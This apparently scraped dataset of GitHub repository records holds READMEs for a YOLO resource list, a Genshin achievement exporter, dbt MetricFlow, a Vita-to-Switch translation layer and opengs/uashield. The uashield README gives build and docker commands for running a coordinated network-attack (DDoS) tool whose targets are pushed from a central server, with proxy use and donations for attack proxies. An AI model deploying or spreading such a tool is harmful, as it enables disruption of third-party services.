[2023-06-08๏ผŒใ€ๆ–‡็Œฎใ€‘่ง†่ง‰transformer็ ”็ฉถ่ฟ›ๅฑ•โ€”โ€”ๅฒไธŠๆœ€ๅ…จ็ปผ่ฟฐ](https://mp.weixin.qq.com/s/zCbFEl8pvPIfjnfIgv8Hqw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒCVerใ€ - [2023-08-02๏ผŒICCV 2023๏ฝœ็›ฎๆ ‡ๆฃ€ๆต‹ๆ–ฐ็ช็ ด๏ผAlignDet๏ผšๆ”ฏๆŒๅ„็ฑปๆฃ€ๆต‹ๅ™จๅฎŒๅ…จ่‡ช็›‘็ฃ้ข„่ฎญ็ปƒ็š„ๆก†ๆžถ](https://mp.weixin.qq.com/s/t7jlTyUP6UxplpythX0dOw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆˆ‘็ˆฑ่ฎก็ฎ—ๆœบ่ง†่ง‰ใ€ - [2023-06-09๏ผŒ[ๅฎž่ทต]YOLOv5ๆๅ‡10ๅ€ๆŽจ็†้€Ÿๅบฆ๏ผšๅˆฉ็”จTensorRT ๅœจJetson NXไธŠ็š„ๆจกๅž‹้ƒจ็ฝฒ](https://mp.weixin.qq.com/s/jWZuNKpVM4k5aDe2JmB-Tg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่‹ฑ็‰นๅฐ”็‰ฉ่”็ฝ‘ใ€ - [2022-08-11๏ผŒๅŸบไบŽ OpenVINOโ„ข๏ธ 2022.1 POT API ๅฎž็Žฐ YOLOv5 ๆจกๅž‹ INT8 ้‡ๅŒ– | ๅผ€ๅ‘่€…ๅฎžๆˆ˜](https://mp.weixin.qq.com/s/DTXVXwf_tPxwsWbSxBv9Sw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆ•ฐๆฎ็ง‘ๅญฆไธŽAIใ€ - [2023-06-22๏ผŒWin10็Žฏๅขƒไธ‹OpenVINO้ƒจ็ฝฒYOLOv5ๆจกๅž‹๏ผšไปŽ็†่ฎบๅˆฐๅฎž่ทต](https://mp.weixin.qq.com/s/v4y-vjsUrlow5EaP_VrF0A) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้ƒญๅฐๅ–ต็ŽฉAIใ€ - [2023-06-22๏ผŒWin10็Žฏๅขƒไธ‹OpenVINO้ƒจ็ฝฒYOLOv5ๆจกๅž‹๏ผšไปŽ็†่ฎบๅˆฐๅฎž่ทต](https://mp.weixin.qq.com/s/v4y-vjsUrlow5EaP_VrF0A) - [2023-09-04๏ผŒ่ถ…่ฏฆ็ป† | ไฝฟ็”จYolov8่ฎญ็ปƒ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†](https://mp.weixin.qq.com/s/KdoZnQArI95eWvqHMeqO0A) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้ƒญๅฐๅ–ต็ŽฉAIใ€ - [2023-02-13๏ผŒๅฆ‚ไฝ•็”จOpenVINOโ„ข่ฎฉYOLOv8่Žทๅพ—1000+ FPSๆ€ง่ƒฝ๏ผŸ](https://mp.weixin.qq.com/s/CroC5jiTh6OXGtFUbWLZwQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒAI่ง†็•Œๅผ•ๆ“Žใ€ - [2023-08-20๏ผŒFast-BEV็š„CUDA่ฝๅœฐ | 5.9msๅณๅฏๅฎž็Žฐ็Žฏ่ง†BEV 3Dๆฃ€ๆต‹่ฝๅœฐ๏ผไปฃ็ ๅผ€ๆบ](https://mp.weixin.qq.com/s/ypL9_QYcCFjxpdF9CrS2dw) - [2024-01-03๏ผŒShape-IoUๅผ€ๆบ | ๅŒๆ—ถๅ…ณๆณจBoxๅฝข็Šถๅ’Œๅฐบๅฏธ๏ผŒๅฎŒ็พŽ่ถ…่ถŠSIoU/EIoU/CIoU็ญ‰๏ผŒYOLOๅˆๆœ‰็ฆไบ†](https://mp.weixin.qq.com/s/sDOtseu4icePW2oQObMoWQ) - [2024-01-19๏ผŒYOLOv4ไธŽๅท็งฏๆณจๆ„ๅŠ›ไปฅๅŠViT็ป“ๅˆ็š„่ฟ›ๅŒ–็‰ˆๆœฌYOLO-Former๏ผŒ็ฒพๅบฆ็จณๆญฅๆๅ‡๏ผ](https://mp.weixin.qq.com/s/N-5nYylqOTx7tEISJYOuuw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๅฐ็™ฝ็Žฉ่ฝฌPythonใ€ - [2023-12-22๏ผŒๅŸบไบŽ YOLOv8 ็š„็–ฒๅŠณ็Šถๆ€ๆฃ€ๆต‹ | ้™„ๆบ็ ](https://mp.weixin.qq.com/s/L_-Ii5QvnGgJwo5WYSUcVg) - [2024-01-22๏ผŒYOLO-NAS ๅฆ‚ไฝ•ๅฐ† YOLO-v8 ็”ฉๅœจ่บซๅŽ๏ผŸ](https://mp.weixin.qq.com/s/pc7TzlZSULNJwIS-liCdzg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆœบๅ™จไน‹ๅฟƒใ€ - [2024-02-23๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹ๆ–ฐSOTA๏ผšYOLOv9้—ฎไธ–๏ผŒๆ–ฐๆžถๆž„่ฎฉไผ ็ปŸๅท็งฏ้‡็„•็”Ÿๆœบ](https://mp.weixin.qq.com/s/HFyADfWKkyw0TivsqH6kXA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ็ ็ง‘ๆ™บ่ƒฝใ€ - [2024-01-30๏ผŒๆจกๅž‹้ƒจ็ฝฒ็ณปๅˆ—๏ผš10x้€Ÿๅบฆๆๅ‡๏ผŒYoloV8็›ฎๆ ‡ๆฃ€ๆต‹ๆจกๅž‹็จ€็–ๅŒ–โ€”CPUไธŠ่ถ…500FPS](https://mp.weixin.qq.com/s/cWRObjaRvL6RgabSdSxVBQ) - [2024-02-19๏ผŒๅŸบไบŽYOLO-World+EfficientSAM็š„้›ถๆ ทๆœฌ็›ฎๆ ‡ๆฃ€ๆต‹ไธŽๅฎžไพ‹ๅˆ†ๅ‰ฒDemo](https://mp.weixin.qq.com/s/u4QBbOeNR48aF9YHWdCQsw) - [2024-02-23๏ผŒYOLOv9ๆฅไบ†! 
ๆŠ›ๅผ€ๆŸๅคฑๅ‡ฝๆ•ฐๅ’Œ็ฝ‘็ปœ็ป“ๆž„๏ผŒๆขไธชๅฏ็ผ–็จ‹ๆขฏๅบฆไฟกๆฏ่ง’ๅบฆ็ปง็ปญๅ‡็บง๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹ๆ–ฐSOTA๏ผ](https://mp.weixin.qq.com/s/TAv_GY3d-tPOX9fKZNBwig) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่‡ชๅŠจ้ฉพ้ฉถDailyใ€ - [2024-02-23๏ผŒYOLOv9็ปˆไบŽๆฅไบ†๏ผ่ฟœ่ถ…็Žฐๆœ‰ๅฎžๆ—ถ็›ฎๆ ‡ๆฃ€ๆต‹ๅ™จ๏ผไฝฟ็”จPGIๅญฆไฝ ๆƒณๅญฆ๏ผ](https://mp.weixin.qq.com/s/1i76NbtC5DD1lPMIMa9f8w) - [2024-05-25๏ผŒYOLOv10ๆฅๅ•ฆ๏ผ็œŸๆญฃๅฎžๆ—ถ็ซฏๅˆฐ็ซฏ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/xxgvub-Y4RJLjbpY6YNxCQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ3D่ง†่ง‰ๅทฅๅŠใ€ - [2024-02-23๏ผŒYOLOv9้œ‡ๆ’ผๆฅ่ขญ๏ผไฝฟ็”จๅฏ็ผ–็จ‹ๆขฏๅบฆไฟกๆฏๅญฆไน ไฝ ๆƒณๅญฆไน ็š„ๅ†…ๅฎน๏ผ](https://mp.weixin.qq.com/s/Fbd-jarVO4LyjlhdxgmnsA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒDeepDrivingใ€ - [2023-07-21๏ผŒAIๆจกๅž‹้ƒจ็ฝฒ | TensorRTๆจกๅž‹INT8้‡ๅŒ–็š„Pythonๅฎž็Žฐ](https://mp.weixin.qq.com/s/IQTCUs8CcfgHxJCyV6cm3w) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒCSharpไธŽ่พน็ผ˜ๆจกๅž‹้ƒจ็ฝฒใ€ - [2024-06-04๏ผŒไฝฟ็”จ TensorRT C++ API ่ฐƒ็”จGPUๅŠ ้€Ÿ้ƒจ็ฝฒ YOLOv10 ๅฎž็Žฐ 500FPS ๆŽจ็†้€Ÿๅบฆโ€”โ€”ๅฟซๅˆฐ้ฃž่ตท๏ผ๏ผ](https://mp.weixin.qq.com/s/yijeZtkRhbQxuSE1AsyUhA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒBestSongCใ€ - [2024-05-24๏ผŒๅŸบไบŽYOLO็ณปๅˆ—็ฎ—ๆณ•๏ผˆYOLOv5ใ€YOLOv6ใ€YOLOv8ไปฅๅŠYOLOv9๏ผ‰ๅ’ŒStreamlitๆก†ๆžถ็š„่กŒไบบๅคด็›”ๆฃ€ๆต‹็ณป็ปŸ](https://mp.weixin.qq.com/s/STAVjII8kAk3MMPbB9vJfQ) - [2024-05-30๏ผŒๅŸบไบŽYOLO็ณปๅˆ—็ฎ—ๆณ•ๅ’ŒStreamlitๆก†ๆžถ็š„ๅ…ญ็ฑปๆฐดๆžœ็›ฎๆ ‡ๆฃ€ๆต‹็ณป็ปŸ](https://mp.weixin.qq.com/s/ZIH1afBpKBa5DgvtHZU1Vg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œไบบๅทฅๆ™บ่ƒฝๅญฆไน ๆŒ‡ๅ—ใ€ - [2024-05-28๏ผŒ็”จ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†ๅฎžๆต‹YOLOv10ๆ•ˆๆžœ๏ผ](https://mp.weixin.qq.com/s/JlGvYGvPa5NyxjEXHLO6uA) ## Videos - bilibiliใ€Œๆˆ‘ๆ˜ฏๅ‚…ๅ‚…็Œชใ€ - [2022-12-14๏ผŒ่‡ชๅˆถๆทฑๅบฆๅญฆไน ๆŽจ็†ๆก†ๆžถ](https://www.bilibili.com/video/BV1HV4y1A7H8) - [2023-06-02๏ผŒไปŽ้›ถ่‡ชๅˆถๆทฑๅบฆๅญฆไน ๆŽจ็†ๆก†ๆžถ](https://www.bilibili.com/video/BV118411f7yM/) ## Star History ![Star History Chart](https://api.star-history.com/svg?repos=codingonion/awesome-yolo-object-detection&type=Date)
🚀🚀🚀 A collection of awesome public YOLO-series object detection projects.
yolo,yolov5,onnx,tensorrt,object-detection,snn,attention,yolov8,autonomous-driving,spiking-neural-network
0
5
5
379
0
1
0
HolographicHat/YaeAchievement
<div align="center"><img width="100" src="https://github.com/HolographicHat/YaeAchievement/blob/master/icon.ico"> # YaeAchievement ![GitHub](https://img.shields.io/badge/License-GPL--3.0-brightgreen?style=flat-square) ![GitHub release (latest by date)](https://img.shields.io/github/v/release/HolographicHat/YaeAchievement?color=brightgreen&label=Release&style=flat-square) ![GitHub issues](https://img.shields.io/github/issues/HolographicHat/YaeAchievement?label=Issues&style=flat-square) ![Downloads](https://img.shields.io/github/downloads/HolographicHat/YaeAchievement/total?color=brightgreen&label=Downloads&style=flat-square) ![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square) Simplified Chinese | [English](README_EN.md) </div> - Supports exporting achievements of all categories - Supports the official server, the channel server (Bilibili), and the international server - No requirements on window size, game language, etc. ## Export targets > Press the corresponding number key to choose an export target; <kbd>0</kbd> is the default 0. [Cocogoat (ๆคฐ็พŠ)](https://cocogoat.work/achievement) 1. [Snap.Hutao (่ƒกๆกƒๅทฅๅ…ท็ฎฑ)](https://github.com/DGP-Studio/Snap.HuTao) 2. [Paimon.moe](https://paimon.moe/achievement/) 3. [Seelie.me](https://seelie.me/achievements) 4. Spreadsheet file `.csv` 5. [Xunkong (ๅฏป็ฉบ)](https://github.com/xunkong/xunkong) 6. [ๅŽŸ้ญ”ๅทฅๅ…ท็ฎฑ](https://apps.apple.com/app/id1663989619) 7. [TeyvatGuide](https://github.com/BTMuli/TeyvatGuide) 8. [UIAF](https://uigf.org/standards/UIAF.html) JSON file ## Usage → [Tutorial.md](Tutorial.md) ## Download [releases/latest](https://github.com/HolographicHat/YaeAchievement/releases/latest) ## Feedback [Issues](https://github.com/HolographicHat/YaeAchievement/issues) or [QQ group: 913777414](https://qm.qq.com/cgi-bin/qm/qr?k=9UGz-chQVTjZa4b82RA_A41vIcBVNpms&jump_from=webapi) ## FAQ 0. Q: The app won't open A: Install the [.NET Runtime](https://dotnet.microsoft.com/en-us/download/dotnet/thank-you/runtime-8.0.4-windows-x64-installer) 1. Q: Genshin Impact reports an error on startup: data exception (31-4302) A: Do not put this tool in the same directory as the Genshin Impact main executable
ๆ›ดๅฟซใ€ๆ›ดๅ‡†็š„ๅŽŸ็ฅžๆˆๅฐฑๅฏผๅ‡บๅทฅๅ…ท
null
27
12
25
273
3
1
1
dbt-labs/metricflow
<p align="center"> <a target="_blank" href="https://transform.co/metricflow"> <picture> <img alt="metricflow logo" src="https://github.com/dbt-labs/metricflow/raw/main/assets/MetricFlow_logo.png" width="auto" height="120"> </picture> </a> <br /><br /> <b>Build and maintain all of your metric logic in code.</b> <br /><br /> <a target="_blank" href="https://twitter.com/dbt_labs"> <img src="https://img.shields.io/twitter/follow/dbt_labs?labelColor=image.png&color=163B36&logo=twitter&style=flat"> </a> <a target="_blank" href="https://www.getdbt.com/community/"> <img src="https://img.shields.io/badge/Slack-join-163B36"> </a> <a target="_blank" href="https://github.com/dbt-labs/metricflow"> <img src="https://img.shields.io/github/stars/dbt-labs/metricflow?labelColor=image.png&color=163B36&logo=github"> </a> <br /> <a target="_blank" href="https://github.com/dbt-labs/metricflow/blob/master/LICENSE"> <img src="https://img.shields.io/pypi/l/metricflow?color=163B36&logo=AGPL-3.0"> </a> <a target="_blank" href="https://pypi.org/project/metricflow/"> <img src="https://img.shields.io/pypi/v/metricflow?labelColor=&color=163B36"> </a> <img src="https://img.shields.io/pypi/pyversions/metricflow?labelColor=&color=163B36"> </p> # Welcome to MetricFlow See our latest updates in the [MetricFlow Changelog](https://github.com/dbt-labs/metricflow/blob/main/CHANGELOG.md)! MetricFlow is a semantic layer that makes it easy to organize metric definitions. It takes those definitions and generates legible and reusable SQL. This makes it easy to get consistent metrics output broken down by attributes (dimensions) of interest. The name comes from the approach taken to generate metrics. A query is compiled into a query plan (represented below) called a dataflow that constructs metrics. The plan is then optimized and rendered to engine-specific SQL. <p align="center"> <img src="https://github.com/dbt-labs/metricflow/raw/main/assets/example_plan.svg" height="500"/> <br /><br /> </p> MetricFlow provides a set of abstractions that help you construct complicated logic and dynamically generate queries to handle: - Multi-hop joins between fact and dimension sources - Complex metric types such as ratio, expression, and cumulative - Metric aggregation to different time granularities - And so much more To get up and running with your own metrics, you should rely on [MetricFlow's documentation](https://docs.getdbt.com/docs/build/build-metrics-intro). ## Licensing MetricFlow is distributed under a Business Source License (BUSL-1.1). For details on our additional use grant, change license, and change date please refer to our [licensing agreement](https://github.com/dbt-labs/metricflow/blob/main/LICENSE). ## Getting Started ### Install MetricFlow MetricFlow can be installed from PyPI for use as a Python library with the following command: ``` pip install dbt-metricflow ``` MetricFlow currently serves as a query compilation and SQL rendering library, built to work in conjunction with a dbt project. As such, using MetricFlow requires a working dbt project and a dbt adapter. We provide the `dbt-metricflow` bundle for this purpose. You may choose to install other adapters as optional extras from dbt-metricflow. You may need to install Postgres or Graphviz. You can do so by following the install instructions for [Postgres](https://www.postgresql.org/download/) or [Graphviz](https://www.graphviz.org/download/). Mac users may prefer to use brew: `brew install postgresql` or `brew install graphviz`. 
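As a concrete illustration of the metric definitions discussed above, here is a minimal sketch of a semantic model and a simple metric in dbt-style YAML. The `orders` model and the `order_total` names are hypothetical, and the exact schema keys may vary between versions, so treat this as a sketch rather than a definitive reference:

```yaml
# Hypothetical example: a semantic model over an `orders` dbt model,
# plus a simple metric defined on top of it.
semantic_models:
  - name: orders
    model: ref('orders')
    defaults:
      agg_time_dimension: ordered_at
    entities:
      - name: order_id
        type: primary              # primary key of the underlying model
    dimensions:
      - name: ordered_at
        type: time
        type_params:
          time_granularity: day
    measures:
      - name: order_total
        agg: sum                   # aggregation applied to the column

metrics:
  - name: order_total
    label: Order total
    type: simple                   # ratio, derived, and cumulative types also exist
    type_params:
      measure: order_total
```

With a definition like this in a dbt project, a query along the lines of `mf query --metrics order_total --group-by metric_time` should compile down to engine-specific SQL; see the documentation linked above for the authoritative schema.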
### Tutorial The best way to get started is to follow the tutorial steps, which you can access by running: ``` mf tutorial ``` Note: this must be run from a dbt project root directory. ## Resources - [Website](https://transform.co/metricflow) - [Documentation](https://docs.getdbt.com/docs/build/build-metrics-intro) - [Slack Community](https://www.getdbt.com/community/) - [MetricFlow Git Repository](https://github.com/dbt-labs/metricflow) - [CHANGELOG.md](https://github.com/dbt-labs/metricflow/blob/main/CHANGELOG.md) - [TENETS.md](https://github.com/dbt-labs/metricflow/blob/main/TENETS.md) ## Contributing and Code of Conduct This project aims to be a place where people can easily contribute high-quality updates in a supportive environment. Please read our [code of conduct](https://docs.getdbt.com/community/resources/code-of-conduct) before diving in. To get started on direct contributions, head on over to our [contributor guide](https://github.com/dbt-labs/metricflow/blob/main/CONTRIBUTING.md). ## License MetricFlow is source-available software. Versions 0 through 0.140.0 were covered by the Affero GPL license. Versions 0.150.0 and greater are covered by the BSL license. MetricFlow is built by [dbt Labs](https://www.getdbt.com/).
MetricFlow allows you to define, build, and maintain metrics in code.
data,analytics,metrics,pypi,business-intelligence,data-modeling,semantic-layer
16
45
982
2,423
86
271
7
opengs/uashield
# ะ”ะพัั‚ัƒะฟะฝะฐ ะฝะพะฒะฐ ะฒะตั€ัั–ั ะทะฐัั‚ะพััƒะฝะบัƒ | New version of tool is available. UACyberShield V2 ะดะพัั‚ัƒะฟะฝะฐ ะทะฐ ะฟะพัะธะปะฐะฝะฝัะผ https://github.com/opengs/itarmykit . ะฆะตะน ั€ะตะฟะพะทะธั‚ะพั€ั–ะน ะฑัƒะดะต ะทะฐั€ั…ั–ะฒะพะฒะฐะฝะพ ั‚ะพะดั– ะบะพะปะธ ะฑัƒะดะต ะฒะธะฟัƒั‰ะตะฝะฐ ัั‚ะฐะฑั–ะปัŒะฝะฐ ะฒะตั€ัั–ั ะฝะพะฒะพะณะพ ะทะฐัั‚ะพััƒะฝะบัƒ. UACyberShield V2 is available under https://github.com/opengs/itarmykit . This repository will be archived when the stable version of the new tool will be released. # UA Cyber SHIELD *CAUTION! We do not support unlawful attacks or malware campaigns that cause technical harm. We provide you with a tool which you can use, but we are not telling or advising you on what to do with it. YOU are responsible of what you choose to do with it !!!! We are just providing a tool JUST LIKE thousand others on Github. If we give you a hammer - YOU are responsible of what you choose to knock with it !* *See this README [in English](README-en.md)* [![Release](https://img.shields.io/badge/Release-latest-blue)](https://github.com/opengs/uashield/releases/latest) ## ะ”ะปั ะบั–ะฑะตั€ะทะฐั…ะธัะฝะธะบั–ะฒ 1. ะŸั€ะพะณั€ะฐะผะธ ะทะฝะฐั…ะพะดัั‚ัŒัั ะฒ [ั€ะตะปั–ะทะฐั…](https://github.com/opengs/uashield/releases) 2. ะ’ะธะฑะธั€ะฐั”ะผะพ [ะฝะฐะนะฝะพะฒัˆะธะน ั€ะตะปั–ะท](https://github.com/opengs/uashield/releases/latest) ั– ัะฒะพัŽ ะฟะปะฐั‚ั„ะพั€ะผัƒ 3. ะกะบะฐั‡ัƒั”ะผะพ ั– ะทะฐะฟัƒัะบะฐั”ะผะพ **ะฃ ะบะพั€ะธัั‚ัƒะฒะฐั‡ั–ะฒ ะฝะฐ Linux ะผะพะถะปะธะฒะพ ั‚ั€ะตะฑะฐ ะฑัƒะดะต ะดะพะดะฐั‚ะธ ะฐั€ะณัƒะผะตะฝั‚ `--no-sandbox`. ะะฐ Windows ะผะฐั” ะฟั€ะฐั†ัŽะฒะฐั‚ะธ ะฑะตะท ะฑัƒะดัŒ-ัะบะธั… ะดะพะดะฐั‚ะบะพะฒะธั… ะฐั€ะณัƒะผะตะฝั‚ั–ะฒ** ## ะฏะบ ั†ะต ะฟั€ะฐั†ัŽั” ะะฐัˆ ั†ะตะฝั‚ั€ ะฒะพะปะพะฝั‚ะตั€ั–ะฒ ะทะฐะนะผะฐั”ั‚ัŒัั ะฒัั–ั”ัŽ ั‚ัะถะบะพัŽ ั€ะพะฑะพั‚ะพัŽ: ะผะพะฝั–ั‚ะพั€ะธะฝะณะพะผ ั†ั–ะปะตะน, ะฟั–ะดั‚ั€ะธะผะบะพัŽ ั‚ะตั…ะฝั–ั‡ะฝะพั— ั–ะฝั„ั€ะฐัั‚ั€ัƒะบั‚ัƒั€ะธ, ะบะพะพั€ะดะธะฝะฐั†ั–ั”ัŽ ะฐั‚ะฐะบ, ะฟะตั€ะตะดะฐั‡ะตัŽ ะดะฐะฝะธั… ะดะพ ะฟั€ะพะณั€ะฐะผ ะบะปั–ั”ะฝั‚ั–ะฒ, ั‚ะพั‰ะพ. ะขะพะผัƒ ะฝะฐ ะผะพะผะตะฝั‚ ะฐั‚ะฐะบะธ ะฒัั– ะฟั–ะดะณะพั‚ะพะฒั‡ั– ะดะฐะฝั– ั”. ะ’ะฐะผ ะทะฐะปะธัˆะฐั”ั‚ัŒัั ั‚ั–ะปัŒะบะธ ะฒัั‚ะฐะฝะพะฒะธั‚ะธ ะฟั€ะพะณั€ะฐะผัƒ ั– ะฟั€ะธั”ะดะฝะฐั‚ะธัั. ะฆั–ะปั– ะทะผั–ะฝัŽัŽั‚ัŒัั ะฐะฒั‚ะพะผะฐั‚ะธั‡ะฝะพ ั– ะฟั–ะดะฒะฐะฝั‚ะฐะถัƒัŽั‚ัŒัั ะท ั†ะตะฝั‚ั€ัƒ ะบะพะพั€ะดะธะฝะฐั†ั–ั—. ## ะ†ะฝั‚ะตั€ั„ะตะนั ะฟั€ะพะณั€ะฐะผะธ ![A working example](docs/working.png) ## ะ—ะฑั–ั€ะบะฐ ะบะพะดัƒ 1. ะšะปะพะฝัƒั”ะผะพ ั€ะตะฟะพะทะธั‚ะพั€ั–ะน: `git clone https://github.com/opengs/uashield.git` 2. ะ’ัั‚ะฐะฝะพะฒะปัŽั”ะผะพ ะทะฐะปะตะถะฝะพัั‚ั–: `cd uashield && yarn install` 3. ะ—ะฑะธั€ะฐั”ะผะพ ะฟั€ะพะณั€ะฐะผัƒ: `yarn build:electron` 4. ะ—ะฐะฟัƒัะบะฐั”ะผะพ ะฒะธะบะพะฝะฐะฒั‡ะธะน ั„ะฐะนะป ะฒ `./dist/electron` ะฐะฑะพ ะตะปะตะบั‚ั€ะพะฝ ะฒะตั€ัั–ัŽ: `yarn start:electron` ### ะ—ะฑั–ั€ะบะฐ ะบะพะดัƒ - headless 1. ะ—ะฑะธั€ะฐั”ะผะพ ะฟั€ะพะณั€ะฐะผัƒ: `yarn build:headless` 2. ะ—ะฐะฟัƒัะบะฐั”ะผะพ `yarn start:headless` ## Headless ะฒะตั€ัั–ั (Docker) 1. ะ—ะฑั–ั€ะบะฐ ะพะฑั€ะฐะทัƒ: `docker build . -t uashield` 2. 
ะ—ะฐะฟัƒัะบ: `docker run uashield --workers=500 --withProxy=true` - ะดะต `workers` - ะบั–ะปัŒะบั–ัั‚ัŒ ะฟะพั‚ะพะบั–ะฒ, ั– --withProxy=`true` | `false` ั‡ะธ ะฒะธ ะฑะฐะถะฐั”ั‚ะต ะฒะธะบะพั€ะธัั‚ะพะฒัƒะฒะฐั‚ะธ ะฟั€ะพะบัั– ะŸะพะฒะฝะฐ ะดะพะฒั–ะดะบะฐ ะฟั€ะพ ะบะพะผะฐะฝะดะธ: `docker run uashield --help` ะะฑะพ ะทะฐ ะดะพะฟะพะผะพะณะพัŽ ะฒะถะต [ะทั–ะฑั€ะฐะฝะพะณะพ ะพะฑั€ะฐะทัƒ](https://github.com/opengs/uashield/pkgs/container/uashield): ```bash docker run ghcr.io/opengs/uashield:master --workers=512 --withProxy=true ``` ## Docker-compose ะฒะตั€ัั–ั 1. ะ—ะฐะฟัƒัะบ: `docker-compose up -d` 2. ะ’ั–ะดั€ะตะดะฐะณัƒะนั‚ะต ะทะฝะฐั‡ะตะฝะฝั ะทะผั–ะฝะฝะธั… `WORKERS` ั‚ะฐ `USEPROXY` ะฒ ั„ะฐะนะปั– `docker-compose.yml` - ะดะต `256` - ะบั–ะปัŒะบั–ัั‚ัŒ ะฟะพั‚ะพะบั–ะฒ, ั– `true` | `false` ั‡ะธ ะฒะธ ะฑะฐะถะฐั”ั‚ะต ะฒะธะบะพั€ะธัั‚ะพะฒัƒะฒะฐั‚ะธ ะฟั€ะพะบัั– ## ะ ะพะทะณะพั€ั‚ะฐะฝะฝั ะฝะฐ Raspberry Pi [![balena deploy button](https://www.balena.io/deploy.svg)](https://dashboard.balena-cloud.com/deploy?repoUrl=https://github.com/opengs/uashield) ## ะ ะพะทะณะพั€ั‚ะฐะฝะฝั ะทะฐ ะดะพะฟะพะผะพะณะพัŽ Ansible [tools/ansible/README.md](tools/ansible/README.md) ## ะ ะพะทะณะพั€ั‚ะฐะฝะฝั ัƒ Kubernetes [tools/helm/README.md](tools/helm/README.md) ## ะ ะพะทะณะพั€ั‚ะฐะฝะฝั ะฝะฐ Play With Docker - ะฑะตะทะบะพัˆั‚ะพะฒะฝะธะน ั–ะฝัั‚ะฐะฝั ะฝะฐ 4 ะณะพะดะธะฝะธ [![Try in PWD](https://raw.githubusercontent.com/play-with-docker/stacks/master/assets/images/button.png)](https://labs.play-with-docker.com/?stack=https://raw.githubusercontent.com/opengs/uashield/master/pwd-docker-compose.yml) ## ะŸะพะถะตั€ั‚ะฒัƒะฒะฐะฝะฝั ะŸะพะถะตั€ั‚ะฒัƒะฒะฐะฝะฝั ะฑัƒะดัƒั‚ัŒ ะฒะธะบะพั€ะธัั‚ะพะฒัƒะฒะฐั‚ะธัั ะฒะธะบะปัŽั‡ะฝะพ ะดะปั ั†ั–ะปะตะน ะฟั€ะพะณั€ะฐะผะธ: 1. ะ—ะฐะบัƒะฟั–ะฒะปั ะฟั€ะพะบัั– ัะตั€ะฒะตั€ั–ะฒ ะดะปั ะฐั‚ะฐะบ 2. ะ—ั€ั–ะดะบะฐ ะทะฐะบัƒะฟั–ะฒะปั ัะตั€ะฒะตั€ั–ะฒ ะดะปั ั€ะพะทะผั–ั‰ะตะฝะฝั IT ั–ะฝั„ั€ะฐัั‚ั€ัƒะบั‚ัƒั€ะธ ะšะพะปะธ ะผะธ ะฟะตั€ะตะผะพะถะตะผะพ ะฒ ั†ั–ะน ะฒั–ะนะฝั– ั– ะฝะฐัั‚ะฐะฝะต ะผะธั€ะฝะธะน ั‡ะฐั, ะณั€ะพัˆั– ั‰ะพ ะทะฐะปะธัˆะฐั‚ัŒัั ะฑัƒะดัƒั‚ัŒ ะฟะตั€ะตะดะฐะฝั– ะฑะปะฐะณะพะดั–ะนะฝะธะผ ะพั€ะณะฐะฝั–ะทะฐั†ั–ัะผ ะฝะฐ ะดะพะฟะพะผะพะณัƒ ะถะตั€ั‚ะฒะฐะผ ั†ั–ั”ั— ะฒั–ะนะฝะธ. ะ ะฐั…ัƒะฝะบะธ ะดะปั ะฟะตั€ะตะบะฐะทัƒ ะบะพัˆั‚ั–ะฒ: - BTC: bc1q7e6ew74x56vdpsev5ycqq8ke3tk4yv5452l25g - ETH: 0x9472538607eE28F69FE7dAcD6C4cC17B9A20664F - USDT (ETH): 0x9472538607eE28F69FE7dAcD6C4cC17B9A20664F **ั†ั ะฐะดั€ะตัะฐ ะฒ ะผะตั€ะตะถั– ETH** ะฏะบัˆะพ ะฒะธ ั…ะพั‡ะตั‚ะต ะฟะพั‡ะฐัั‚ัƒะฒะฐั‚ะธ ั€ะพะทั€ะพะฑะฝะธะบั–ะฒ ะบะฐะฒะพัŽ ั‰ะพะฑ ะฒะพะฝะธ ะผะพะณะปะธ ะฟั€ะพะณัƒะปัŽะฒะฐั‚ะธ ั€ะพะฑะพั‚ัƒ ั– ะฝะต ัะฟะฐั‚ะธ ะฝะพั‡ะฐะผะธ: - BTC: bc1q7g5s3c89lymc9vtrf0y8tqyx4mg0hefeyr6zsv - ETH: 0x75A291AB6795f747177975bac250B47A33ee54Ed - USDT (ETH): 0x75A291AB6795f747177975bac250B47A33ee54Ed **ั†ั ะฐะดั€ะตัะฐ ะฒ ะผะตั€ะตะถั– ETH** ะ’ ะผะฐะนะฑัƒั‚ะฝัŒะพะผัƒ ะผะธ ะดะพะดะฐะผะพ ั—ั… ั‰ะต ะฑั–ะปัŒัˆะต :)
Volunteer Ukrainian security platform to protect us from Russian forces on the Internet
ukraine,ukraine-invasion,cybersecurity
37
38
113
338
27
5
6
xerpi/vita2hos
# _vita2hos_ A PlayStation Vita to Horizon OS (Nintendo Switch OS) translation layer (**_not_** an emulator) ## How does it work? PlayStation Vita (ARMv7 CPU) executables can be run natively on the Nintendo Switch's ARMv8 CPU in 32-bit execution mode. When loading a PlayStation Vita executable, _vita2hos_ redirects the [module](https://wiki.henkaku.xyz/vita/Modules) imports of said executable to jump to routines that implement the same behavior using native Horizon OS services, like the ones exposed by the original PlayStation Vita OS modules. ## How can I use it? ### Running it on a real console 1. Copy `vita2hos.nsp` to your microSD card (i.e. to: `atmosphere/vita2hos.nsp`) 2. Create [`atmosphere/config/override_config.ini`](https://github.com/Atmosphere-NX/Atmosphere/blob/master/config_templates/override_config.ini) and add the following lines to it: ```ini [hbl_config] override_any_app=true override_any_app_key=R override_any_app_address_space=32_bit ; 